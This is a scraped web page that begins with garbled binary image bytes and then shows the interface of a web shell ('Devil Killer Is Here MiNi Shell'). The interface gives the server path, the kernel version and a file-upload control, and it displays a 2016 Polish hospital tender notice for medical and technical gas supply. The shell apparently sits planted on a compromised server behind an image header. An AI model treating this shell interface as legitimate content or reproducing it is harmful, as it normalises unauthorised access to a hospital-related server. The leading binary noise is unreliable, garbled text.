JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160304/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160304/49130-N-2016.html

<p class="kh_header"><b>Kraków: Dostawa gazów medycznych i technicznych</b><br>
<b>Numer ogłoszenia: 49130 - 2016; data zamieszczenia: 04.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny im. Stefana Żeromskiego Samodzielny Publiczny Zakład Opieki Zdrowotnej w Krakowie , os. Na Skarpie 66, 31-913 Kraków, woj. małopolskie, tel. (012) 6441956, faks (012) 6444756.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zeromski-szpital.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa gazów medycznych i technicznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa gazów medycznych i technicznych w podziale na 2 pakiety:
Pakiet 1 - Dostawa tlenu ciekłego wraz z dzierżawą zbiornika ciekłego tlenu z systemem telemetrii i dzierżawą rezerwowej 24 stanowiskowej rozprężalni butlowej tlenu med. oraz dostawa gazów medycznych wraz z dzierżawą butli oraz dzierżawą rozprężalni  podtlenku azotu med. i sprężonego powietrza
Pakiet 2 - Dostawa gazów specjalnych wraz z dzierżawą butli
Rodzaj i ilość gazów ujętych w poszczególnych pakietach zawiera załącznik nr 1.1 do SIWZ - formularz asortymentowo-cenowy. 
Zamawiający zastrzega sobie prawo zamówienia mniejszej ilości gazów, niż określone w załączniku nr 1.1. do SIWZ, w przypadku zmniejszenia się jego zapotrzebowania.
2.  Zasady składania zamówienia na gazy (Pakiety 1, 2):
a) bieżące zamówienia na gazy należy realizować z uwzględnieniem terminu dostawy, rodzaju, ilość towaru, rodzaju opakowania oraz innych warunków szczegółowych zgodnie z zamówieniami składanymi pisemnie/e-mailem lub telefonicznie.
b) zgłoszenia będą odbywać się sukcesywnie, zgodnie z potrzebami zamawiającego od poniedziałku do piątku.
c) Zamawiający wymaga, aby Wykonawca posiadał dostęp on-line umożliwiający podgląd dokumentów sprzedaży i dostawa 
3. 	Tryb realizacji zamówienia na gazy (Pakiety 1, 2):
a) obowiązkiem Wykonawcy jest potwierdzenie telefonicznie (na wskazany numer tel.) lub e-mailem (na wskazany adres e-mail)  przyjęcia zamówienia i zrealizowanie go: 
do 2 dni roboczych od momentu zgłoszenia, w dni robocze tj. poniedziałek - piątek w godzinach 
800 - 20 00  na adres wskazany w zamówieniu (Zamawiający posiada dwa magazyny gazów medycznych na swoim terenie) - dotyczy pakietu 1
max. do 3 dni roboczych od momentu zgłoszenia, w dni robocze tj. poniedziałek - piątek w godzinach 800 - 20 00  na adres wskazany w zamówieniu (Zamawiający posiada dwa magazyny gazów medycznych na swoim terenie) - dotyczy pakietu 2
b) realizowana przez Wykonawcę bieżąca dostawa gazów musi być zgodna asortymentowo i ilościowo 
z zamówieniem otrzymanym od Zamawiającego;
c) gazy dostarczane będą w odpowiednich zbiornikach transportowych (butlach), będących własnością Wykonawcy;
d) zbiorniki (butle) muszą być odpowiednio oznakowane z aktualną cechą legalizacyjną;
e) Zamawiający będzie dzierżawił od Wykonawcy dostarczone butle, rampę tlenową, zbiornik ciekłego tlenu oraz rampy sprężonego powietrza i podtlenku azotu;
f) zwrot pustych zbiorników przenośnych (butli) będzie następował wraz z kolejną dostawą gazów;
g) dostawa zamówionych gazów będzie realizowana przez Wykonawcę do wskazanych magazynów znajdujących się w szpitalu w Krakowie os. Na Skarpie 66, 
UWAGA:  Wykonawca odpowiada za dostawę towaru do magazynów - własnymi siłami i na własny koszt - wraz z rozładunkiem i wniesieniem;
h) koszt transportu gazów wliczony jest w cenę gazów;
i) do każdej dostawy Wykonawca dołączy dokumenty potwierdzające rodzaj i ilość gazu oraz certyfikat jakości;
j) Wykonawca na każde żądanie Zamawiającego dostarczy karty charakterystyki produktu leczniczego i/lub karty charakterystyki substancji niebezpiecznych w terminie wskazanym przez Zamawiającego;
k) każdorazowy odbiór ilościowy dostarczonych gazów następuje u zamawiającego za pisemnym potwierdzeniem przy czym  Zamawiającego i Wykonawcę reprezentuje przy  odbiorze upoważniony pracownik;
l) w przypadku wadliwej dostawy, stwierdzonej przy odbiorze dostawy, Wykonawca zobowiązany jest do wymiany dostarczonego towaru , na własny koszt do 2 dni roboczych;
m) reklamacje ilościowe i jakościowe nie stwierdzone w trakcie dostawy Zamawiający zgłasza Wykonawcy do 7 dni roboczych pisemnie/e-mailem lub drogą telefoniczną;
n) Wykonawca musi być przygotowany że w przypadku połączenia pakietów na żądanie będzie wystawiał osobno faktury na  gazy medyczne i na gazy techniczne;
o) okres ważności  tlenu medycznego ma wynosić 36 miesięcy (dopuszczamy okres 12 miesięcy pod warunkiem, że Wykonawca dwukrotnie po 12 i 24  miesiącach wymieni butle tlenowe, którym kończy się data ważności na własny koszt);
p) Wykonawca jest zobowiązany utrzymywać wszystkie rampy w stałej sprawności technicznej oraz wykonywać roczne przeglądy i dostarczać protokoły z przeglądów Zamawiającemu.   
4. 	Wymagania dotyczące dostaw skroplonego tlenu medycznego do stacji zgazowania ze zbiornikiem kriogenicznym (wraz z systemem telemetrii) oraz warunki jego dzierżawy (Pakiet 1):
a) Zamawiający wymaga, aby w skład stacji zgazowania wchodziły następujące elementy: zbiornik kriogeniczny dla skroplonego tlenu o pojemności wodnej  minimum 9000 l  i wyprodukowany nie wcześniej niż w 2010 r. (Zamawiający dopuszcza zbiornik wyprodukowany przed 2010 r. pod warunkiem, że zbiornik przeszedł  generalny remont wykonany w 2015 r. lub w 2016 r.) z podłączeniem do przewoźnego zbiornika samochodowego (cysterny) wraz z dobraną do potrzeb szpitala parownicą i panelem sterującym oraz panelem redukcyjnym, zapewniającym stałe ciśnienie w sieci oraz podłączenie odbioru tlenu medycznego z siecią szpitalną. 
Zbiornik kriogeniczny musi odpowiadać wymiarom i wytrzymałości fundamentu istniejącego stanowiska w miejscu przewidzianym dla tego zbiornika, wszelkie przeróbki miejsca osadzenia zbiornika i parownicy oraz wszystkich instalacji Wykonawca wykona na własny koszt. Jeśli Wykonawca uzna, że dotychczasowa instalacja i fundament nie spełnia koniecznych warunków do posadowienia stałego zbiornika ciekłego tlenu, wszelkie prace projektanckie, przebudowę i zezwolenia wykonuje na własny koszt.
b) Zamawiający zaleca dokonanie wizji lokalnej w miejscu montażu zbiornika kriogenicznego przed złożeniem oferty. Osobami upoważnionymi do kontaktu w sprawie odbycia wizji lokalnej są: 
Mgr inż Maria Dzięgiel - Kierownik Działu Technicznego tel. 12 6229214
c) Wykonawca na własny koszt sporządzi wymaganą przepisami prawa dokumentację techniczną niezbędną do posadowienia, zainstalowania i uruchomienia zbiornika wraz z instalacją doprowadzającą, parownicą 
i stacją redukcyjną oraz własnym staraniem dokona niezbędnych uzgodnień z odpowiednim oddziałem Urzędu Dozoru Technicznego.
d) Wykonawca na własny koszt i odpowiedzialność dokona posadowienia, zainstalowania i uruchomienia zbiornika wraz z instalacją doprowadzającą, parownicą i stacją redukcyjną, a także instalacją towarzyszącą. System Telemetrii do zdalnego i lokalnego nadzoru zbiornika kriogenicznego rozumiany jest jako kompaktowe urządzenie zamontowane na płaszczu zewnętrznym zbiornika z ciekły tlenem medycznym, pozwalającym zdalnie odczytywać przez Zamawiającego poziom napełnienia  zbiornika.
e) Obowiązkiem Wykonawcy będzie stałe, zdalne (bezobsługowe ze strony Zamawiającego) monitorowanie za pomocą telemonitoringu do zdalnego nadzoru zbiornika kriogenicznego, ilości skroplonego tlenu w zbiorniku kriogenicznym i wg własnego rozeznania i doświadczenia uzupełnianie jego odpowiedniego zapasu z uwzględnieniem uwarunkowań eksploatacyjnych i dostawczych, zapewniając nieprzerwaną płynność dostaw i niewyczerpalny zapas w zbiorniku, uwzględniający aktualne potrzeby. Wykonawca zobowiązany jest zapewnić przyjazd serwisu w wypadku awarii, Wykonawca ma obowiązek usunąć awarię w ciągu max. 24h . Na czas braku zasilania szpitala ze zbiornika kriogenicznego (gdy ten czas przekroczy 24h od momentu wystąpienia awarii) Wykonawca ma obowiązek dostarczyć  butle 40l z tlenem medycznym  do obsługi rampy backupowej w cenie gazu ciekłego liczonego jako średnie zużycie dzienne z poprzedniego miesiąca. Dopuszczalne jest również zasilanie z przewoźnych zbiorników z tlenem ciekłym.
f) Wykonawca przeszkoli wyznaczonych pracowników szpitala (w liczbie 9 osób) w zakresie obsługi dzierżawionego zbiornika kriogenicznego w dniu oddania zbiornika do eksploatacji lub innym wyznaczonym przez Zamawiającego, jednak nie później niż 3 dni od daty uruchomienia zbiornika. Szkolenie mogą przeprowadzić pracownicy Wykonawcy odpowiedzialni za szkolenie personelu własnego. Szkolenie musi być udokumentowane stosownym protokołem, zawierającym podpisy pracowników, protokół lub jego kopia ma być przekazany Zamawiającemu w ciągu 7 dni od dnia szkolenia.
g) Wszelkie sprawy związane z odbiorem zbiornika kriogenicznego przez UDT jego konserwacje, utrzymanie w należytym stanie technicznym, utrzymywanie czystości zewnętrznych powłok zbiornika (mycie minimum raz w roku), okresowe przeglądy, usuwanie awarii, legalizacje itp. przez cały okres trwania dzierżawy należą do Wykonawcy - właściciela zbiornika,
h) Skroplony tlen medyczny do zbiornika dostarczany będzie każdorazowo przy pomocy specjalistycznego transportu, tzw. cysterny wraz z tankowaniem,
i) Wykonawca musi posiadać na stanie magazynu ilości przedmiotowego asortymentu zapewniające płynność dostaw.
j) Wykonawca zobowiązany jest na własny koszt i odpowiedzialność utrzymywać zbiornik wraz z parownicą i systemem telemonitoringu w stałej sprawności technicznej.
k) Wykonawca zobowiązany jest na własny koszt zdemontować zbiornik kriogeniczny dla skroplonego tlenu w terminie podanym przez Zamawiającego po wygaśnięciu umowy.
l) Do momentu dostarczenia, montażu i uruchomienia stacji zgazowania Wykonawca zobowiązany jest do dostarczania tlenu medycznego sprężonego lub tlenu medycznego ciekłego w zbiornikach przewoźnych do instalacji Szpitala w cenie tlenu ciekłego liczonego jako średnie zużycie dzienne z poprzedniego miesiąca.
m) Zamawiający ustali  minimalny poziom napełnienia zbiornika, przy którym ma nastąpić dostawa ciekłego tlenu
n) Informacje dodatkowe:
Miesięczne zużycie: 18-23 ton/m
Przepływ średni: 20- 35  kg/h
Przepływ maks. 200 m3/h
Ciśnienie robocze w punkcie dostawy: 5,5 bar
Ciśnienie minimalne w punkcie dostawy : 5,3 bar
Ciśnienie maksymalne w punkcie dostawy: 5,68 bar
Brak reduktora sieciowego będącego własnością Zamawiającego
Zasilanie elektryczne: kabel YKY5x10, zabezpieczenie trójfazowe typ D 63A
Przyłącz jest własnością Zamawiającego, granica na zaciskach bezpiecznikowych po stronie odpływu
Odległość  stacji zasilania od rozdzielni ok. 75m, długość wymagana kabla zasilającego 5-  7m
Fundament posiada zabezpieczenie odgromowe
Wymiary fundamentu: 3,20 m x 3,20 m; parownicy: 0,82 m x 1,55 m
Teren zbiornika jest oświetlony oraz ogrodzony, posiada dogodny dostęp ze wszystkich stron do zamontowanych urządzeń
Droga przed terenem zbiornika jest wyłożona kostką
Położenie stacji zgazowywania zapewnia bezpieczny rozładunek.
5. Zamawiający oczekuje, że Wykonawca  zdemontuje istniejące rampy, a w ich miejsce zamontuje rozprężalnie tlenu medycznego butlowego, podtlenku azotu  medycznego i sprężonego powietrza do napędu narzędzi chirurgicznych  (dotyczy Pakietu 1).
Następnie od momentu przekazania ich do eksploatacji do dnia 15.05.2019 r. będzie pobierał dzierżawę, zapewniał ich ciągłą i nieprzerwaną pracę oraz serwisował je przez cały ten okres. Po zakończeniu umowy Wykonawca zdemontuje je na własny koszt w terminie podanym przez Zamawiającego oraz nie zagrażając ciągłości pracy szpitala. Czas usunięcia awarii każdej rampy max. do 24h.
6. 	Wymagania techniczne dotyczące rozprężalni butlowych (Pakiety 1)
Wszystkie rozprężanie  muszą spełniać wymagania normy PN-EN ISO 7396-1.
Nie dopuszcza się przełączania stron ramp butlowych przy pomocy elektrozaworów.
Tablice redukcyjne każdej rampy muszą być wyprodukowane po 2012 r. (dotyczy wszystkich ramp butlowych).
a) Wymagania techniczne dotyczące rozprężalni rezerwowej tlenu butlowego medycznego - rampy
tlenowej:
Rozprężalnia musi spełniać wymagania ustawy z dnia 20 maja 2010 r. o wyrobach medycznych (Dz. U. Nr 107 poz. 679 ze zm.) tj. posiadać wpisy i świadectwa wydane przez uprawnione organy: deklarację zgodności CE producenta (dotyczy wszystkich klas wyrobu medycznego), certyfikat jednostki notyfikującej (dotyczy klasy wyrobu medycznego: I sterylna, I z funkcją pomiarową, IIa, IIb, III), zgłoszenie/powiadomienie/wniosek do Prezesa Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych. 
Kompletne urządzenie powinno być oznaczone znakiem CE na zgodność z wymaganiami Dyrektywy Europejskiej 93/42/EEC o wyrobach medycznych jako kompletne urządzenie.
Montaż tablicy redukcyjnej wraz z rampą 2x12 butli 150 bar , 40l 
Wydajność rampy - min 100  m3/h, ciśnienie robocze 5,5 bar.
Łączniki butlowe metalowe, giętkie
Temperatura pracy -20 oC - +60 oC
Automatyczne włącznie rampy przy braku ciśnienia w sieci
Instalacja alarmowa sygnalizująca uruchomienie rampy. Opcjonalnie dodatkowe powiadamianie sms-em wybrany nr tel.  
Przyłącze zasilania awaryjnego
b) Wymagania techniczne dotyczące  rozprężalni podtlenku azotu medycznego:
Rozprężalnia musi spełniać wymagania ustawy z dnia 20 maja 2010 r. o wyrobach medycznych (Dz. U. Nr 107 poz. 679 ze zm.) tj. posiadać wpisy i świadectwa wydane przez uprawnione organy: deklarację zgodności CE producenta (dotyczy wszystkich klas wyrobu medycznego), certyfikat jednostki notyfikującej (dotyczy klasy wyrobu medycznego: I sterylna, I z funkcją pomiarową, IIa, IIb, III), zgłoszenie/powiadomienie/wniosek do Prezesa Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych.
Kompletne urządzenie powinno być oznaczone znakiem CE na zgodność z wymaganiami. Dyrektywy Europejskiej 93/42/EEC o wyrobach medycznych  jako kompletne urządzenie. 
Montaż tablicy redukcyjnej wraz z rampą 2x6 butli. 
Wydajność rampy min. 5kg  na dobę, ciśnienie 5,5 bar. 
Łączniki butlowe metalowe, giętkie (pozwalające zasilać rampę z butli 40l jaki i z butli 10l)
Instalacja alarmowa sygnalizująca awarię lub brak podtlenku w butlach.
Przyłącze zasilania awaryjnego.
c) Wymagania techniczne dotyczące  rozprężalni sprężonego powietrza chirurgicznego:
Montaż tablicy redukcyjnej wraz z rampą 2x8 butli 40l sprężonego powietrza.
Łączniki butlowe metalowe, giętkie. 
Wydajność min. 75 m3/h, ciśnienie robocze 8,5 bar., redukcja dwustopniowa 
Przyłącze zasilania awaryjnego.
TERMIN REALIZACJI ZAMÓWIENIA
1. Dostawy gazów realizowane będą sukcesywnie przez okres 36 miesięcy, tj. nie wcześniej niż  od dnia 15.04.2016 r. do dnia 15.04.2019 r., z uwzględnieniem bieżących potrzeb Zamawiającego (dotyczy pakietów 1, 2)
2. Koszty dzierżawy butli będą rozliczane w okresach miesięcznych (dotyczy pakietów 1, 2)
3. Pakiet 1
Posadowienie, montaż, podłączenie i przekazanie do eksploatacji zbiornika kriogenicznego (zbiornika stacjonarnego) dla tlenu ciekłego wraz z urządzeniami towarzyszącymi zostanie wykonane w terminie do 25.04.2016 r., czas realizacji 48 godzin od momentu rozpoczęcia prac. 
Dzierżawa zbiornika kriogenicznego - od momentu przekazania zbiornika do eksploatacji  do dnia 15.04.2019 r. 
Przekazanie do eksploatacji Zamawiający rozumie jako samodzielne zasilanie szpitala przez zbiornik ciekłego tlenu (zbiornik stacjonarny) bez pomocy rozprężalni (rampy) rezerwowej.
Montaż w wyznaczonym miejscu rampy tlenowej 24-butlowej zostanie wykonany w terminie do 29.04.2016 r. Na czas posadowienia zbiornika Wykonawca zapewni bezpieczny sposób zasilania instalacji szpitalnej w tlen medyczny.
Dzierżawa rampy tlenowej - od  momentu przekazania do eksploatacji do dnia 15.05.2019 r.
Montaż ramp sprężonego powietrza i podtlenku azotu będzie wykonany wyłącznie 27.04.2016 r. lub 25.05.2016 r.
Dzierżawa każdej rampy będzie naliczana od momentu przekazania jej do eksploatacji do dnia 15.05.2019 r.
4. Zamawiający przewiduje możliwość przedłużenia terminu realizacji zamówienia, gdy w okresie obowiązywania umowy zamówienie nie zostanie zrealizowane w pełnym zakresie wartościowym..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 24.10.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta zawierająca całość przedmiotu zamówienia powinna być zabezpieczona wadium w wysokości 17.060,00 zł. Wadium dla poszczególnych pakietów wynosi:
pakiet 1: 17.000,00 zł
pakiet 2: 60,00 zł
2. Wadium musi być wniesione przed upływem terminu składania ofert.
3. Wadium może być wnoszone w jednej lub kilku następujących formach:
a) pieniądzu na konto Szpitala (decyduje termin uznania rachunku Zamawiającego): 
DEUTSCHE BANK PBC S.A. O/KRAKÓW NR: 45 1910 1048 3400 2331 1121 0002
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 
9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
4. Jeżeli wadium zostanie wniesione w pieniądzu, przelewem, Wykonawca dołącza do oferty kserokopię wpłaty wadium z potwierdzeniem dokonanego przelewu. Na poleceniu przelewu należy wpisać: Wadium - Dostawa gazów medycznych i technicznych (ZP 11/2016)  pakiet _.
W pozostałych przypadkach (pkt. VIII.3. b, c, d, e) wymagane jest dołączenie do oferty potwierdzonej za zgodność z oryginałem kserokopii dokumentu stanowiącego zabezpieczenie wadium. Oryginał tego dokumentu należy złożyć razem z ofertą nie zszywając go z nią.
5. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.
6. Dokumenty, o których mowa w punkcie VIII.3. muszą zachowywać ważność przez cały okres, w którym Wykonawca jest związany ofertą.
7. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela Gwaranta. 
Podpis winien być sporządzony w sposób umożliwiający jego identyfikację, np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska).
Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a oraz ust.5 ustawy.
8. Zwrot wadium. Zamawiający zwraca wadium:
1) Wszystkim Wykonawcom, niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, 
z zastrzeżeniem sytuacji wskazanej w pkt VIII.9.1. SIWZ;
2) Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, po zawarciu umowy w sprawie zamówienia publicznego;
3) Na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 
Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium w przypadkach wskazanych powyższej w pkt 1, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Zamawiający wyznacza zarazem termin ponownego wniesienia wadium przez Wykonawcę.
9. Utrata wadium. Zamawiający zatrzymuje wadium wraz z odsetkami w przypadkach, gdy:
1) Wykonawca, którego oferta została wybrana, odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
2) 	Zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
3) 	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o udzielenie zamówienia w ramach pakietu 1 zobowiązany jest posiadać zezwolenie na obrót produktami leczniczymi. W ramach pakietu 2 Zamawiający nie precyzuje szczegółowo warunku. Ocena spełniania warunku dokonana zostanie zgodnie z formułą spełnia - nie spełnia, na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych oraz w oparciu o informacje zawarte w dokumentach załączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
